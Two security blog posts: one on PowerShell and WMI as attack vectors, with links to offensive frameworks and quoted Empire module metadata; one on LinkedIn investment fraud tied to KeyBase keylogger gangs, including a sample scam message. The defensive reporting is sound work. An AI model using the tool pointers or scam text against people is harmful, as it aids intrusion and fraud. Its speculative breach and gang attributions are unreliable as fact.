There are probably 10 more reasons to worry about Powershell, these are just ones i'm familiar with. 

I first begun using PowerShell to perform very mundane tasks that should be automated such as the creation of user accounts, the deletion of user accounts etc. I then found out that Microsoft was releasing a version of Windows which was a command line with no GUI. This effectively means you can manage it via command line and subsequently remotely. This did exist before, but the functionality used in R2 was far greater than it was.


No. There is nobody here.


Server Core, the version which i begun to use in place of the full blown GUI version was easy, i was able to configure Windows RM using sconfig. I then begun to use Powershell in a way which made me understand just how powerful it was. I'm no script ninja, i am able to write scripts which help me do work in a faster, more agile way. 

Then i discovered this Get-wmiobject i realised was able to use WMI classes which as far as i remember was the single most dangerous thing i'd seen on a network, barring physical access to a comms room. Why? Well, WMI is essentially a remote management framework, you can do the worst thing possible on an endpoint - Execute code.  I hope this sufficiently conveys the capability of it?

Further to this, a lot of very smart people are already doing fantastic work in this place. In no order whatsoever. I would recommend following, and keeping an eye on their work very closely.

  • Matt Graeber - https://twitter.com/mattifestation
  • Will - https://twitter.com/harmj0y
  • Sean Metcalf - https://twitter.com/PyroTek3
  • Chris Campbell ( Great surname by the way ) https://twitter.com/obscuresec

Some of the frameworks currently undergoing contined development

  • http://www.powershellempire.com/
  • https://github.com/PowerShellMafia/PowerSploit
  • https://github.com/samratashok/nishang

Sean presented probably the most important talk on Active Directory attacks in a very long time and thankfully the ability to detect them at Blackhat 2015 - Slides here i have watched this video more times than i remember. The stats included from this are from the DBR 2015



'' Its way to easy to get someone to someone to click on a link '' Sean Metcalf 2015

If you need to defend against these kinds of attacks, the work done by Sean is available here.

Recommended reading

  • https://www.nsa.gov/ia/_files/app/spotting_the_adversary_with_windows_event_log_monitoring.pdf
  • https://mva.microsoft.com/en-US/training-courses/using-powershell-for-active-directory-8397
  • https://technet.microsoft.com/en-gb/library/cc995228.aspx

Some very public breaches have contained links to the potential usage of these tools if you still needed convincing.



The hackers behind the attack on infidelity website Ashley Madison alerted staff to the breach by setting their laptops to play AC/DC song 'Thunderstruck'.

The following is a code snippet available from Powershell Empire..

import base64
from lib.common import helpers

class Module:

def __init__(self, mainMenu, params=[]):

self.info = {
'Name': 'Invoke-Thunderstruck',

'Author': ['@obscuresec'],

'Description': ("Play's a hidden version of AC/DC's Thunderstruck video while "
"maxing out a computer's volume."),

'Background' : True,

'OutputExtension' : None,

'NeedsAdmin' : False,

'OpsecSafe' : False,

'MinPSVersion' : '2',

'Comments': [
'https://github.com/obscuresec/shmoocon/blob/master/Invoke-TwitterBot'
]
}

It may be completely unrelated, but it's an interesting thought to link the two together...

Thanks to all those named above for the work they are doing in this area.

 

 

 

Please add me to your #Linkedin sockpuppet network!

Linkedin has approximately 414m active users of which, a part are completely fake. This practise has been observed in the past with fake recruiters targeting researchers. 

This content is the result of the same 'gang' of Nigerian criminals who favour KeyBase to steal sensitive credentials. I've observed these gangs (along with @techhelplist who finds a lot of the details included here) using Linkedin as a new platform to perform attempted financial fraud.

A large number of screenshots shared with me are as a the result of a misconfigured Keybase panel, there is a well known bug in Keybase which allows unauthenticated access to the /images/ directory to anyone who knows how to locate them. Palo Alto have listed a large number here

A percentage of determined sock puppets are using LinkedIn as a means at defrauding a significant number of business in following countries:

  • UAE
  • US
  • UK

Figures are created as a result of the companies targeted in the panel images

 

The sectors that are targeted include Real Estate, Investment & Law. This kind of fraud is complex in the sense it involves geographically displaced criminals to 'link up' to to be successful. The fraud is highly likely comitted from Nigeria (Thanks to @techhelplist again who helped ID the content and fraud gang) the concept is simple - Offering investment or seeking investment depending on the potential victim.

The belief that this  fraudulent operation is from Nigeria is because of the evidence provided, this included active Facebook content and helpful photographs of places of work, and friends associated with the gang.

This below image is taken from a panel which shows our 'guy' logged into a Linkedin profile, and a large number of messages all with the same content.

Seeking investment or offering investment.

@malwarehunterteam do a great job on supplying a large number of samples to various malware, iSpy came to my attention recently and the codebase is almost identical to KeyBase with both employing the same stealing functions. I will post a more detailed article on iSpy when i get time.

Reconnaissance message

We offer secured loand or funds to individuals and companies at low interest rates. we offer long and short terms loans or funding of any projects. Our firm has a recored a lot of breakthroughs in the provision of first-class financial services to our clients.
— Akeem

The message above is pretty static and appears to be sent to a large number of potential victims. The method of communication varies across email providers, if you believe you've been approached by this gang, or have been part of the attempted fraud process please contact me, i can share a number of verified IOC's.

The below image is a cap from the /images/ directory which includes a conversation with the 'master' who shares the devices used to perform the initial reconnaissance. Pg.5 on this alludes to the hierarchy involved

In summary, this concept of attempted fraud by social networks should sufficiently deliver a message that nobody is who you believe they are, particularly when dealing with financial transactions.

FireEye produced a research article on the thriving economy on 'scammers' operating out of Nigeria.  Pg.11 is of interest in the context of the content here.

The scammers use a variety of tools for distributing these exploits
and keyloggers, such as email extractors, email notifiers, bulk
mailing providers, and VPN/proxy providers. The email extractors
help scammers scrape email addresses of potential targets from
various sites which are fed to bulk mailing applications. They use
proxy providers as a precaution when logging into their victims’
accounts to hide their IP addresses. They also use email notifiers
to monitor incoming emails.
— https://www2.fireeye.com/rs/848-DID-242/images/rpt_nigerian-scammers.pdf

Trust, but verify is a mantra that i preach. It's dissapointing that Linkedin does not have any method of formal verification for its users. There is no PGP or Keybase.io input required, even most DNM require some form of ID verification!

@thegrugq makes the point far more eloquently that i ever could. In short, the game of cyber security has changed, and the content in which you operate or call your working environment, is someone else's lunch.

Full slides here